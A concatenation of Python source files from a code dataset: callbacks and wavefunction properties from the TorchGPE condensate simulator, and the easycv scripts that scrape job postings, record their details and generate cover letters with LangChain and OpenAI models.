"""The phase (in radians) of the real space wave function
"""
return torch.angle(self.psi)
# --- Manage the update of psi and psik ---
@property
def psi(self):
"""The real space wave function of the gas.
Returns the most updated real space wave function of the gas. If the last updated wave function is the one in momentum space,
computes and stores the real space wave function as its iFFT before returning it.
When a value is assigned to psi, takes care of the normalization before storing it.
"""
# If the last updated wave function is psik, compute psi
if self._updated_wavefunction == UPDATED_PSIK:
# Take into account that psik is padded
self.psi = iftn(self._psik)[
self.N_grid//2:self.N_grid+self.N_grid//2, self.N_grid//2:self.N_grid+self.N_grid//2]
self._updated_wavefunction = UPDATED_BOTH
return self._psi
@psi.setter
def psi(self, value):
if value.dtype != self.complex_dtype:
value = value.type(self.complex_dtype)
self._psi = normalize_wavefunction(value, self.dx, self.dy)
self._updated_wavefunction = UPDATED_PSI
@property
def psik(self):
"""The momentum space wave function of the gas.
Returns the most updated momentum space wave function of the gas. If the last updated wave function is the one in real space,
computes and stores the momentum space wave function as its iFFT before returning it.
When a value is assigned to psik, takes care of the normalization before storing it.
"""
# If the last updated wave function is psi, compute psik
if self._updated_wavefunction == UPDATED_PSI:
# Before computing the FFT, pad psik
self.psik = ftn(pad(self._psi, (self.N_grid//2, self.N_grid//2,
self.N_grid//2, self.N_grid//2), mode="constant", value=0))
self._updated_wavefunction = UPDATED_BOTH
return self._psik
@psik.setter
def psik(self, value):
if value.dtype != self.complex_dtype:
value = value.type(self.complex_dtype)
self._psik = normalize_wavefunction(value, self.dkx, self.dky)
self._updated_wavefunction = UPDATED_PSIK
@property
def coordinates(self):
"""The coordinates of the gas
Returns a tuple containing the coordinates of the gas in real space.
"""
return (self.X, self.Y)
@property
def momenta(self):
"""The momenta of the gas
Returns a tuple containing the momenta of the gas in momentum space.
"""
return (self.Kx, self.Ky)
| 16,750 | Python | .py | 277 | 50.638989 | 197 | 0.661521 | qo-eth/TorchGPE | 8 | 1 | 1 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,174 | callbacks.py | qo-eth_TorchGPE/torchgpe/bec2D/callbacks.py | import torch
import numpy as np
import fcntl
import json
import warnings
import matplotlib.pyplot as plt
import tempfile
from os import path
import ffmpeg
from shutil import rmtree
from abc import ABCMeta
from matplotlib import ticker
from .potentials import DispersiveCavity
from ..utils.potentials import LinearPotential, NonLinearPotential
from ..utils.plotting import pi_tick_formatter
from matplotlib.gridspec import GridSpec
from ..utils import prompt_yes_no, enumerate_chunk
from mpl_toolkits.axes_grid1.axes_divider import make_axes_locatable
from tqdm.auto import tqdm
from matplotlib.colors import LogNorm
import multiprocess
import atexit
import signal
import psutil
from ..utils.callbacks import Callback
class CavityMonitor(Callback):
"""Callback monitoring the time dependent parameters of a dispersive cavity and its field.
During the simulation, the values of cavity detuning, pump strength and cavity field are stored. Once the simulation is finished, the saved parameters are accessible via the :py:attr:`gpe.bec2D.callbacks.CavityMonitor.alpha`, :py:attr:`gpe.bec2D.callbacks.CavityMonitor.pump` and :py:attr:`gpe.bec2D.callbacks.CavityMonitor.cavity_detuning` tensors.
Args:
dispersive_cavity (DispersiveCavity): The cavity to be monitored.
save_every (int): Optional. The number of epochs after which the parameters should be saved. Defaults to 1.
"""
def __init__(self, dispersive_cavity: DispersiveCavity, save_every=1) -> None:
super().__init__()
self.save_every = save_every
#: list(float): A list of the pump strengths. It is a list of lists, where each inner list contains the pump strengths for a single propagation. At the end of the simulation, it is converted to a PyTorch tensor.
self.pump = []
#: list(float): A list of the cavity detunings. It is a list of lists, where each inner list contains the cavity detunings for a single propagation. At the end of the simulation, it is converted to a PyTorch tensor.
self.cavity_detuning = []
#: list(complex): A list of the cavity field amplitudes. It is a list of lists, where each inner list contains the cavity field amplitudes for a single propagation. At the end of the simulation, it is converted to a PyTorch tensor.
self.alpha = []
#: list(float): A list of the times at which the parameters were saved. It is a list of lists, where each inner list contains the times for a single propagation. At the end of the simulation, it is converted to a PyTorch tensor.
self.times = []
self.cavity = dispersive_cavity
def on_propagation_begin(self):
self.alpha.append([])
self.pump.append([])
self.cavity_detuning.append([])
self.times.append([])
def on_epoch_end(self, epoch):
if epoch % self.save_every != 0:
return
time = epoch*self.propagation_params["time_step"]
self.times[-1].append(time)
alpha = self.cavity.get_alpha(self.gas.psi, time=time)
self.alpha[-1].append(alpha)
self.pump[-1].append(self.cavity._lattice_depth(time))
self.cavity_detuning[-1].append(self.cavity._cavity_detuning(time))
def on_propagation_end(self):
self.alpha[-1] = torch.tensor(self.alpha[-1])
self.pump[-1] = torch.tensor(self.pump[-1])
self.cavity_detuning[-1] = torch.tensor(self.cavity_detuning[-1])
self.times[-1] = torch.tensor(self.times[-1])
class Animation(Callback):
"""Callback generating an animation of the propagation of the wavefunction.
Args:
output_file (str): The path where to store the mp4 animation.
save_every (int): Optional. The number of epochs after which a frame of the animation is saved. Defaults to 1.
fps (int): Optional. The number of frames per second of the animation. Defaults to 25.
cores (int): Optional. The number of cores to use for the generation of the images. Defaults to 1.
density (bool): Optional. Whether to plot the real space density. Defaults to True.
phase (bool): Optional. Whether to plot the phase. Defaults to True.
densityk (bool): Optional. Whether to plot the momentum space density. Defaults to False.
potentials (bool): Optional. Whether to plot the potential landscape. Defaults to False.
cavities (list): Optional. A list of :class:`gpe.bec2D.potentials.DispersiveCavity` objects to monitor. Defaults to [].
time_dependent_variables (list): Optional. A list of tuples of the form (label, function) where label is a string and function is a function of time returning a float. The value of the function will be plotted as a function of time. Defaults to [].
"""
def __init__(self, output_file, save_every=1, fps=25, cores=1, density=True, phase=True, densityk=False, potentials=False, cavities=[], time_dependent_variables=[]):
super().__init__()
self.save_every = save_every
self.output_folder = path.dirname(output_file)
self.output_file = output_file
self.fps = fps
self.N_cores = cores
self._plot_density = density
self._plot_phase = phase
self._plot_densityk = densityk
self._plot_potentials = potentials
self._time_dependent_variables = time_dependent_variables
self._tdv_history = [[] for _ in range(len(time_dependent_variables))]
self._cavities = cavities
self._cavities_history = [[] for _ in range(len(cavities))]
self._times = []
if not path.exists(self.output_folder):
raise Exception("The output folder does not exist")
if path.exists(self.output_file):
if not prompt_yes_no("The specified file already exists. Are you sure you want to overwrite it? Y/n", True):
raise Exception("The output file already exists")
N_2d_plots = density + phase + densityk + potentials
self.N_1d_plots = 2*len(cavities) + len(time_dependent_variables)
self.n_cols = 2 if N_2d_plots % 2 == 0 else N_2d_plots
self.n_rows = (int(np.ceil(N_2d_plots/2)) if N_2d_plots %
2 == 0 else 1)+self.N_1d_plots
self._height_ratios = [3]*(self.n_rows-self.N_1d_plots)
self._height_ratios.extend([1]*self.N_1d_plots)
def _register_run(self):
with open(path.join(path.expanduser("~"), ".GPE_animation_cleanup.json"), 'a+') as file:
fcntl.flock(file, fcntl.LOCK_EX) # Acquire exclusive lock
file.seek(0)
try:
existing_data = json.load(file)
except (json.JSONDecodeError, EOFError):
existing_data = {}
warnings.warn("The executions register file does not exist and it will be created. If, before now, you have run the animation callback and the process has been interrupted, there might be some leftover temporary folders. Please, check the folder /tmp/ and delete eventual temporary folders manually.")
existing_data.setdefault(str(psutil.Process().pid), []).extend([self.temp_dir])
file.truncate(0)
file.seek(0)
json.dump(existing_data, file)
file.flush()
fcntl.flock(file, fcntl.LOCK_UN) # Release lock
def _deregister_run(self, pid=None, folder=None):
if pid is None:
pid = str(psutil.Process().pid)
with open(path.join(path.expanduser("~"), ".GPE_animation_cleanup.json"), 'a+') as file:
fcntl.flock(file, fcntl.LOCK_EX) # Acquire exclusive lock
file.seek(0)
try:
existing_data = json.load(file)
except (json.JSONDecodeError, EOFError):
existing_data = {}
if pid in existing_data:
if folder is not None:
self.clear_dir(folder)
existing_data[pid] = [f for f in existing_data[pid] if f != folder]
if len(existing_data[pid]) == 0:
del existing_data[pid]
else:
for f in existing_data[pid]:
self.clear_dir(f)
del existing_data[pid]
file.truncate(0)
file.seek(0)
json.dump(existing_data, file)
file.flush()
fcntl.flock(file, fcntl.LOCK_UN) # Release lock
def _clean_leftovers(self):
try:
with open(path.join(path.expanduser("~"), ".GPE_animation_cleanup.json"), "r") as f:
runs = json.load(f)
for key, value in runs.items():
if not psutil.pid_exists(int(key)):
self._deregister_run(key)
except (json.JSONDecodeError, FileNotFoundError):
return
def clear_dir(self, dir):
if path.exists(dir):
rmtree(dir)
def on_propagation_begin(self) -> None:
"""At the beginning of the simulation, creates a temporary folder where to store the images and initializes the variables used to store the data.
Args:
epoch (int): The epoch number
"""
self.temp_dir = tempfile.mkdtemp()
# Register the temporary folder for deletion at exit and on SIGINT. Check if the folder exists before deleting it to avoid errors
self._clean_leftovers()
self._register_run()
atexit.register(self.clear_dir, self.temp_dir)
signal.signal(signal.SIGINT, lambda sig, frame: (self.clear_dir(self.temp_dir), self._deregister_run(), signal.default_int_handler(signal.SIGINT, None)) )
signal.signal(signal.SIGTERM, lambda sig, frame: (self.clear_dir(self.temp_dir), self._deregister_run(), signal.default_int_handler(signal.SIGTERM, None)) )
self.tensor_index = 0
if self._plot_potentials:
self._potentials = self.propagation_params["potentials"]
self._max_density = 0
self._max_densityk = 0
self._max_potential = 0
if self.propagation_params["N_iterations"]/self.save_every > 1000:
warnings.warn("The animation is going to generate many frames. Consider increasing the save_every parameter.")
def on_epoch_end(self, epoch):
"""After each epoch, if the epoch number is a multiple of ``save_every``, saves the data to the temporary folder.
Args:
epoch (int): The epoch number
"""
if epoch % self.save_every != 0:
return
time = epoch*self.propagation_params["time_step"]
self._times.append(time*1000)
if self._plot_density:
torch.save(self.gas.density.to(torch.float16), path.join(
self.temp_dir, f"density_{self.tensor_index}.torch"))
max_density = self.gas.density.max()
if max_density > self._max_density:
self._max_density = max_density
if self._plot_phase:
torch.save(self.gas.phase.to(torch.float16), path.join(
self.temp_dir, f"phase_{self.tensor_index}.torch"))
if self._plot_densityk:
torch.save(self.gas.densityk.to(torch.float16), path.join(
self.temp_dir, f"densityk_{self.tensor_index}.torch"))
max_densityk = self.gas.densityk.max()
if max_densityk > self._max_densityk:
self._max_densityk = max_densityk
if self._plot_potentials:
total_potential = sum(
potential.get_potential(self.gas.X, self.gas.Y, time) for potential in self._potentials if issubclass(type(potential), LinearPotential)
)
total_potential += sum(
potential.potential_function(self.gas.X, self.gas.Y, self.gas.psi, time) for potential in self._potentials if issubclass(type(potential), NonLinearPotential)
)
torch.save(total_potential.to(torch.float16), path.join(
self.temp_dir, f"potential_{self.tensor_index}.torch"))
max_potential = total_potential.max()
if max_potential > self._max_potential:
self._max_potential = max_potential
if len(self._cavities):
for i, cavity in enumerate(self._cavities):
self._cavities_history[i].append(
cavity.get_alpha(self.gas.psi, time=time).cpu())
if len(self._time_dependent_variables):
for i, [label, variable] in enumerate(self._time_dependent_variables):
self._tdv_history[i].append(variable(time))
self.tensor_index += 1
def _plot_stored(self, params) -> None:
"""Plots the data stored in the temporary folder.
Args:
params (list): A list of tuples of the form (image_index, time) where image_index is the index of the image to be plotted and time is the in-simulation time at which the image was saved.
"""
for param in params:
image_index, time = param
fig = plt.figure(
figsize=(6*self.n_cols, 6*self.n_rows-4*self.N_1d_plots))
gs = GridSpec(self.n_rows, self.n_cols, figure=fig,
height_ratios=self._height_ratios)
row_index = 0
col_index = 0
if self._plot_density:
ax = fig.add_subplot(gs[row_index, col_index])
im = ax.pcolormesh(self.gas.X.cpu(), self.gas.Y.cpu(), torch.load(path.join(
self.temp_dir, f"density_{image_index}.torch"), map_location="cpu"), norm=LogNorm(vmax=self._max_density, vmin=1e-10), shading='auto')
ax_divider = make_axes_locatable(ax)
cax = ax_divider.append_axes("right", size="6%", pad="2%")
cbar = plt.colorbar(im, cax=cax)
ax.set_xlabel(r"$x$")
ax.set_ylabel(r"$y$")
ax.set_title("Real space density")
ax.set_aspect('equal')
if col_index == self.n_cols-1:
col_index = 0
row_index += 1
else:
col_index += 1
if self._plot_phase:
ax = fig.add_subplot(gs[row_index, col_index])
im = ax.pcolormesh(self.gas.X.cpu(), self.gas.Y.cpu(), torch.load(path.join(
self.temp_dir, f"phase_{image_index}.torch"), map_location="cpu"), vmin=-np.pi, vmax=np.pi, shading='auto', cmap="bwr")
ax_divider = make_axes_locatable(ax)
cax = ax_divider.append_axes("right", size="6%", pad="2%")
cbar = plt.colorbar(im, cax=cax, format=ticker.FuncFormatter(
pi_tick_formatter), ticks=ticker.MultipleLocator(base=np.pi/2))
ax.set_xlabel(r"$x$")
ax.set_ylabel(r"$y$") # account for units and set title
ax.set_title("Phase")
ax.set_aspect('equal')
if col_index == self.n_cols-1:
col_index = 0
row_index += 1
else:
col_index += 1
if self._plot_densityk:
ax = fig.add_subplot(gs[row_index, col_index])
im = ax.pcolormesh(self.gas.Kx.cpu(), self.gas.Ky.cpu(), torch.load(path.join(
self.temp_dir, f"densityk_{image_index}.torch"), map_location="cpu"), norm=LogNorm(vmax=self._max_densityk, vmin=1e-10), shading='auto')
ax_divider = make_axes_locatable(ax)
cax = ax_divider.append_axes("right", size="6%", pad="2%")
cbar = plt.colorbar(im, cax=cax)
ax.set_xlabel(r"$kx$")
ax.set_ylabel(r"$ky$") # account for units and set title
ax.set_title("Momentum space density")
ax.set_aspect('equal')
if col_index == self.n_cols-1:
col_index = 0
row_index += 1
else:
col_index += 1
if self._plot_potentials:
ax = fig.add_subplot(gs[row_index, col_index])
im = ax.pcolormesh(self.gas.X.cpu(), self.gas.Y.cpu(), torch.load(path.join(
self.temp_dir, f"potential_{image_index}.torch"), map_location="cpu"), shading='auto', vmin=0, vmax=self._max_potential)
ax_divider = make_axes_locatable(ax)
cax = ax_divider.append_axes("right", size="6%", pad="2%")
cbar = plt.colorbar(im, cax=cax)
ax.set_xlabel(r"$x$")
ax.set_ylabel(r"$y$") # account for units and set title
ax.set_title("Potential landscape")
ax.set_aspect('equal')
if col_index == self.n_cols-1:
col_index = 0
row_index += 1
else:
col_index += 1
if len(self._cavities):
for i, history in enumerate(self._cavities_history, start=1):
ax = fig.add_subplot(gs[row_index, :])
ax.axvline(x=self._times[image_index], color="red")
ax.plot(self._times, np.abs(history))
ax.set_xlabel(r"$t$ [$ms$]")
ax.set_ylabel(r"$|\alpha|$") # account for units and title
ax.set_title(f"Cavity {i} field")
ax.set_xlim(0, self._times[-1])
col_index = 0
row_index += 1
ax = fig.add_subplot(gs[row_index, :])
ax.axvline(x=self._times[image_index], color="red")
ax.plot(self._times, np.angle(history))
ax.set_xlabel(r"$t$ [$ms$]")
# account for units and title
ax.set_ylabel(r"$Arg(\alpha)$")
ax.set_xlim(0, self._times[-1])
col_index = 0
row_index += 1
if len(self._time_dependent_variables):
for i, [label, variable] in enumerate(self._time_dependent_variables):
ax = fig.add_subplot(gs[row_index, :])
ax.axvline(x=self._times[image_index], color="red")
ax.plot(self._times, self._tdv_history[i])
ax.set_xlabel(r"$t$ [$ms$]")
ax.set_ylabel(r"$V$") # account for units and title
ax.set_title(label)
ax.set_xlim(0, self._times[-1])
col_index = 0
row_index += 1
if isinstance(self.propagation_params["time_step"], float):
fig.suptitle(
f"t: {time:.2f} ms")
plt.subplots_adjust(left=0.1, bottom=0.1,
right=0.9, top=0.9, wspace=0.4, hspace=0.4)
fig.savefig(path.join(self.temp_dir, f"{image_index}.png"))
plt.close(fig)
def on_propagation_end(self) -> None:
"""At the end of the simulation, generates the animation and saves it to the specified path.
"""
ctx = multiprocess.get_context("spawn")
with ctx.Pool(self.N_cores) as pool:
_ = list(tqdm(pool.imap(self._plot_stored, enumerate_chunk(self._times, int(np.ceil(len(self._times)/self.N_cores)))),
total=self.N_cores, smoothing=0, desc="Picture generation", bar_format='{l_bar}{bar}| {n_fmt}/{total_fmt}', leave=False))
print("Merging the pictures into a movie...", end="\r")
(
ffmpeg
.input(path.join(self.temp_dir, "%d.png"), framerate=self.fps)
.output(self.output_file, pix_fmt='yuv420p', vcodec='libx264')
.global_args("-nostats")
.global_args("-loglevel", "0")
.run(overwrite_output=True)
)
print(f"Animation saved to {self.output_file}")
self.clear_dir(self.temp_dir)
self._deregister_run(folder=self.temp_dir)
| 20,095 | Python | .py | 356 | 43.567416 | 353 | 0.594431 | qo-eth/TorchGPE | 8 | 1 | 1 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,175 | setup.py | geshijoker_easycv/setup.py | from setuptools import setup, find_packages
# Read the contents of requirements.txt
with open('requirements.txt') as f:
required_packages = f.read().splitlines()
setup(
name='easycv',
version='0.0',
packages=find_packages(),
description='A Python package for easily customize cover letters.',
long_description=open('README.md').read(),
long_description_content_type='text/markdown',
author='Ge Shi',
author_email='[email protected]',
url='https://github.com/geshijoker/easycv',
license='MIT',
install_requires=required_packages, # Include requirements from requirements.txt
classifiers=[
'Development Status :: 3 - Alpha',
'Intended Audience :: Developers',
'License :: OSI Approved :: GPL-3.0 license',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.10',
'Programming Language :: Python :: 3.11',
'Programming Language :: Python :: 3.12',
],
) | 991 | Python | .py | 26 | 32.769231 | 85 | 0.670124 | geshijoker/easycv | 8 | 0 | 0 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,176 | savejob.py | geshijoker_easycv/savejob.py | import argparse
parser = argparse.ArgumentParser(description="Take inputs from user to collect job position information")
parser.add_argument("--file", "-f", required=True, help="The path to load your pdf resume file")
parser.add_argument("--url", "-u", required=True, help="The url to the job page")
parser.add_argument("--key", "-k", required=True, help="The user key for the foundation model")
parser.add_argument("--model", "-m", default="gpt-3.5-turbo", choices=["gpt-3.5-turbo", "gpt-4"],
help="The foundation model you want to select to complete the task")
args = parser.parse_args()
import os
os.environ["OPENAI_API_KEY"] = args.key
from langchain_community.document_loaders import AsyncChromiumLoader
from langchain_community.document_transformers import BeautifulSoupTransformer
loader = AsyncChromiumLoader([args.url])
html = loader.load()
from langchain_community.document_transformers import Html2TextTransformer
html2text = Html2TextTransformer()
html_transformed = html2text.transform_documents(html)
from langchain_text_splitters import RecursiveCharacterTextSplitter
chunk_size = 1000
chunk_overlap = 30
text_splitter = RecursiveCharacterTextSplitter(
chunk_size=chunk_size, chunk_overlap=chunk_overlap
)
splits = text_splitter.split_documents(html_transformed)
from langchain_community.vectorstores import Chroma
from langchain_openai import ChatOpenAI, OpenAIEmbeddings
from langchain_anthropic import ChatAnthropic
vectorstore = Chroma.from_documents(documents=splits, embedding=OpenAIEmbeddings())
import bs4
from langchain import hub
# prompt = hub.pull("rlm/rag-prompt")
llm = ChatOpenAI(model_name=args.model, temperature=0)
def format_docs(docs):
return "\n\n".join(doc.page_content for doc in docs)
from langchain_core.runnables import RunnablePassthrough
from langchain_core.prompts import ChatPromptTemplate
from langchain_core.output_parsers import StrOutputParser, CommaSeparatedListOutputParser, JsonOutputParser
from langchain_core.output_parsers.openai_functions import JsonOutputFunctionsParser
# question cannot be answered using the information provided answer with "N/A".
template = """
System:
You are an applicant for a job. Based on the job description in the {context}.
You collect information to answer {question}.
If you don't know the answer, say "N/A". Keep the answer succinct.
User: What's the title of the position?
AI: Research Scientist
User: What's the working location of the position?
AI: Davis, CA
User: What's the degree requirement of the position?
AI: Bachelor's
User: How many years of working experience required by the position?
AI: 3
User: What's the salary range of the position?
AI: $10,000/month to $12,000/month
User: Does the company sponsor a working visa?
AI: No
User: Does the company requires citizenship?
AI: Yes
User: What's experience level of the position?
AI: Senior
Context: {context}
User: {question}
AI: """
prompt = ChatPromptTemplate.from_template(template)
retriever = vectorstore.as_retriever()
rag_chain = (
{"context": retriever | format_docs, "question": RunnablePassthrough()}
| prompt
| llm
| StrOutputParser()
)
questions = [
"What's the name of the company or institution? Give me only the name.",
"What's the title of the position? Give me only the name of the title.",
"What's the working location of the position? Give me a short answer.",
"What's the degree requirement of the position? Answer in one word.",
"How many years of working experience or new graduate is required by the position? Answer in numbers.",
"What's the salary range of the position? Answer in numbers.",
"Does the company sponsor a working visa? Answer yes or no.",
"Does the company requires citizenship? Answer yes or no.",
"What's experience level of the position? For example, intern, full-time, senior, and so on. Answer in one word.",
]
csvRow = [rag_chain.invoke(question) for question in questions]
csvRow.append(args.url)
import csv
path = "job-record.csv"
fields = ["company", "position", "location", "degree requirement", "working years", "salary range", "sponsorship", "citizenship", "experience level", "link"]
if not os.path.isfile(path):
with open(path,'w') as f:
writer = csv.writer(f)
writer.writerow(fields)
with open(path,'a') as f:
writer = csv.writer(f)
writer.writerow(csvRow)
| 4,370 | Python | .py | 94 | 44.361702 | 157 | 0.778799 | geshijoker/easycv | 8 | 0 | 0 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,177 | easycv.py | geshijoker_easycv/easycv.py | import os
import sys
import getpass
import argparse
import magic
def check_file_type(filename):
mime = magic.Magic(mime=True)
file_type = mime.from_file(filename)
if 'pdf' in file_type.lower():
return 'PDF'
elif 'msword' in file_type.lower() or 'wordprocessingml' in file_type.lower():
return 'DOC'
elif 'text' in file_type.lower():
return 'TXT'
else:
return 'Unknown'
parser = argparse.ArgumentParser(description="Take inputs from user to generate a cover letter.")
parser.add_argument("--resume", required=True,
help="The path to load your pdf resume file (txt, pdf, or doc).")
parser.add_argument("--jd", default='files/jd.txt',
help="The path to load the job description txt file.")
parser.add_argument("--user", default='files/user_cv_prompt.txt',
help="The user input txt file to guide the writing of cover letter.")
parser.add_argument("--model", "-m", default="gpt-3.5-turbo", choices=["gpt-3.5-turbo", "gpt-4"],
help="The foundation model you want to select to complete the task")
args = parser.parse_args()
# set the openai key
os.environ["OPENAI_API_KEY"] = getpass.getpass("Enter your OpenAI key: ")
from langchain_community.document_loaders import PyPDFLoader, TextLoader, ReadTheDocsLoader
from langchain_chroma import Chroma
from langchain.memory.vectorstore import VectorStoreRetrieverMemory
from langchain_text_splitters import RecursiveCharacterTextSplitter
from langchain.chains import ConversationChain, create_history_aware_retriever, create_retrieval_chain
from langchain.chains.combine_documents import create_stuff_documents_chain
from langchain_openai import ChatOpenAI, OpenAIEmbeddings
from langchain_core.output_parsers import StrOutputParser
from langchain_core.runnables import RunnablePassthrough
from langchain_core.prompts import PromptTemplate, ChatPromptTemplate, MessagesPlaceholder
from langchain_core.messages import HumanMessage
import bs4
from langchain import hub
chunk_size = 1000
chunk_overlap = 50
temperature = 0.2
# Create the LLM
llm = ChatOpenAI(model_name=args.model, temperature=temperature)
# Create rag QA of the job description
job_name = input('The title of the job: ')
company_name = input('The name of the company: ')
jd_file = open(args.jd, "r")
job_description = jd_file.read()
jd_file.close()
job_description = '\n'.join((f'The title of the job is {job_name}', f'The name of the company is {company_name}', job_description))
text_splitter = RecursiveCharacterTextSplitter(
chunk_size=chunk_size, chunk_overlap=chunk_overlap, add_start_index=True
)
jd_splits = text_splitter.split_text(job_description)
jd_docs = text_splitter.create_documents(jd_splits)
jd_vectorstore = Chroma.from_documents(documents=jd_docs, embedding=OpenAIEmbeddings())
llm = ChatOpenAI(model_name=args.model, temperature=0.2)
jd_retriever = jd_vectorstore.as_retriever(search_type="similarity", search_kwargs={"k": 3})
def format_docs(docs):
return "\n\n".join(doc.page_content for doc in docs)
contextualize_q_system_prompt = """Given a chat history and the latest user question \
which might reference context in the chat history, formulate a standalone question \
which can be understood without the chat history. Do NOT answer the question, \
just reformulate it if needed and otherwise return it as is."""
contextualize_q_prompt = ChatPromptTemplate.from_messages(
[
("system", contextualize_q_system_prompt),
MessagesPlaceholder("chat_history"),
("human", "{input}"),
]
)
jd_history_aware_retriever = create_history_aware_retriever(
llm, jd_retriever, contextualize_q_prompt
)
qa_system_prompt = """You are an assistant for question-answering tasks. \
Use the following pieces of retrieved context to answer the question. \
If you don't know the answer, just say that you don't know. \
keep the answer concise.\
{context}"""
qa_prompt = ChatPromptTemplate.from_messages(
[
("system", qa_system_prompt),
MessagesPlaceholder("chat_history"),
("human", "{input}"),
]
)
question_answer_chain = create_stuff_documents_chain(llm, qa_prompt)
jd_rag_chain = create_retrieval_chain(jd_history_aware_retriever, question_answer_chain)
# keep recording the chat history
chat_history = []
# questions on the job descriptions
questions = [
"What's name of the company?",
"What's the culture of it?",
"What's the value mission of the company?"
"What's the title of the job?",
"What are the requirements of it, including but not limited to degree, citizenship and skills?",
"What are the job responsibilities of it?",
]
for question in questions:
msg = jd_rag_chain.invoke({"input": question, "chat_history": chat_history})
chat_history.extend([HumanMessage(content=question), msg["answer"]])
# Load the resume and QA on resume
re_file = open(args.resume, "r")
re_file_type = check_file_type(args.resume)
if re_file_type == 'PDF':
loader = PyPDFLoader(args.resume)
elif re_file_type == 'DOC':
loader = ReadTheDocsLoader(args.resume)
elif re_file_type == 'TXT':
loader = TextLoader(args.resume)
else:
sys.exit(f"The file type of {args.resume} is not supported.")
re_pages = loader.load_and_split(text_splitter)
re_file.close()
re_vectorstore = Chroma.from_documents(documents=re_pages, embedding=OpenAIEmbeddings())
docs = re_vectorstore.similarity_search("What are the schools the applicant attended?", k=3)
re_retriever = re_vectorstore.as_retriever(search_type="similarity", search_kwargs={"k": 3})
re_system_prompt = """You are an applicant for a job with the given resume. \
Use the following pieces of retrieved context to answer questions about yourself towards the job. \
If you don't know the answer, just say that you don't know. \
keep the answer concise.\
{context}"""
re_prompt = ChatPromptTemplate.from_messages(
[
("system", re_system_prompt),
MessagesPlaceholder("chat_history"),
("human", "{input}"),
]
)
re_question_answer_chain = create_stuff_documents_chain(llm, re_prompt)
re_rag_chain = create_retrieval_chain(re_retriever, re_question_answer_chain)
# resume questions
questions = [
"Do you meet the degree requirement of the job?",
"What projects you did that shows the required skills of the job and why?",
"Can you show you are a good cultural fit for the job?"
"Did you worked or interned in the company before? If so, tell me what position it was and what project you did."
]
for question in questions:
msg = re_rag_chain.invoke({"input": question, "chat_history": chat_history})
chat_history.extend([HumanMessage(content=question), msg["answer"]])
# based on the chat history, create a customized cover letter for the job
cv_system_prompt = """You are an applicant (with a resume) for a job (with a job description). \
Write as the first-person narrative.
Use the chat history context and human input instruction to generate a cover letter customized for the job. \
If any message is negative for the job application, do not include it in the cover letter. \
If any information such as referrer and the time to start work are unknown, leave a placeholder for the user to fill in. \
keep the answer concise with a maximum of 4 paragraphs and 500 words.\
"""
cv_prompt = ChatPromptTemplate.from_messages(
[
("system", cv_system_prompt),
MessagesPlaceholder("chat_history"),
("human", "{input}"),
]
)
user_file = open(args.user, "r")
user_input = user_file.read()
cv_chain = (
cv_prompt
| llm
| StrOutputParser()
)
cover_letter = cv_chain.invoke({"input": user_input, "chat_history": chat_history})
# Save the written cover letter to output file
output_names = ["cover_letter", "_".join(job_name.strip().split()), "_".join(company_name.strip().split())]
output_file = '-'.join(output_names) + '.txt'
with open(output_file, "w") as f:
f.writelines(cover_letter)
| 8,020 | Python | .py | 173 | 42.971098 | 131 | 0.738016 | geshijoker/easycv | 8 | 0 | 0 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,178 | linkedin_scraper.py | geshijoker_easycv/linkedin_scraper.py | import requests
import os
import json
from selenium import webdriver
from bs4 import BeautifulSoup
# url = 'https://arxiv.org/abs/2404.04253'
# URL to scrape
def single_page_scraper(url):
# Send a GET request to the URL
driver = webdriver.Chrome()
driver.get(url)
# html = requests.get(url).response
html = driver.page_source
# Parse the HTML content using BeautifulSoup
soup = BeautifulSoup(html, 'html.parser')
body = soup.body
print(body)
# text = body.get_text(separator=' ', strip=True)
with open("jd.txt", "w") as file:
file.writelines(str(body))
# # Extract contents based on the provided web structure descriptions
# # body = soup.find('body', class_='render-mode-BIGPIPE nav-v2 ember-application icons-loaded boot-complete')
# body = soup.find('body')
# print(body)
# div_application_outlet = body.find('div', class_='application-outlet')
# div_authtication_outlet = div_application_outlet.find('div', class_='authtication_outlet')
# div_scaffold_layout = div_authtication_outlet.find('div', class_='scaffold-layout scaffold-layout--breakpoint-xl scaffold-layout--list-detail scaffold-layout--reflow scaffold-layout--has-list-detail jobs-search-two-pane__layout')
# div_scaffold_layout_inner = div_scaffold_layout.find('div', class_='scaffold-layout__row scaffold-layout__content scaffold-layout__content--list-detail')
# scaffold_layout_main = div_scaffold_layout_inner.find('main', id='main')
# div_scaffold_layout_container = scaffold_layout_main.find('div', class_='scaffold-layout__list-detail-container')
# div_scaffold_layout_detail = div_scaffold_layout_container.find('div', class_='scaffold-layout__list-detail-inner scaffold-layout__list-detail-inner--grow')
# div_scaffold_layout_detail_overflow = div_scaffold_layout_detail.find('div', class_='scaffold-layout__detail overflow-x-hidden jobs-search__job-details')
# div_job_search = div_scaffold_layout_detail_overflow.find('div', class_='jobs-search__job-details--wrapper')
# div_job_search_container = div_job_search.find('div', class_='jobs-search__job-details--container')
# div_job_view_layout = div_job_search_container.find('div', class_='job-view-layout jobs-details')
# div_job_view_firstchild = div_job_view_layout.find_all('div')[0]
# div_job_detail_main = div_job_view_firstchild.find('div', class_='jobs-details__main-content jobs-details__main-content--single-pane full-width')
# div_job_detail_all_children = div_job_detail_main.find_all('div')
# div_job_detail_firstchild = div_job_detail_all_children[0]
# div_job_detail_secondchild = div_job_detail_all_children[1]
# div_t_14 = div_job_detail_firstchild.find('div', class_='t-14')
# div_relative_job_detail = div_t_14.find('div', class_='relative job-details-jobs-unified-top-card__container--two-pane')
# div_relative_job_firstchild = div_relative_job_detail.find_all('div')[0]
# div_position = div_relative_job_firstchild.find('div', class_='display-flex justify-space-between flex-wrap')
# div_job_detail_unified = div_relative_job_firstchild.find('div', class_='job-details-jobs-unified-top-card__primary-description-container')
# div_mt2_mb2 = div_relative_job_firstchild.find('div', class_='mt2 mb2')
# div_mt2_mb2_ul = div_mt2_mb2.find('ul')
# div_mt2_mb2_ul_li = div_mt2_mb2_ul.find_all('li')
# div_mt2_mb2_job_type = div_mt2_mb2_ul_li[0]
# div_mt2_mb2_company = div_mt2_mb2_ul_li[1]
